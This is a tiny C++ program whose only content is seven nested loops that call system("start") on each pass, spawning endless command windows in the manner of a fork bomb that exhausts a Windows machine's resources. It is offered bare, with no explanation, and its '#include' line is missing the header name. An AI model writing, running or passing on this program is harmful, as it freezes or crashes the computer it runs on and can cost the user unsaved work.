#include
using namespace std;
int main(){
for(int a=1;a<=100;a++){
for(int b=1;b<=100;b++){
for(int c=1;c<=100;c++){
for(int d=1;d<=100;d++){
for(int e=1;e<=100;e++){
for(int f=1;f<=100;f++){
for(int g=1;g<=100;g++){
system("start");
}
}
}
}
}
}
}
return 0;
}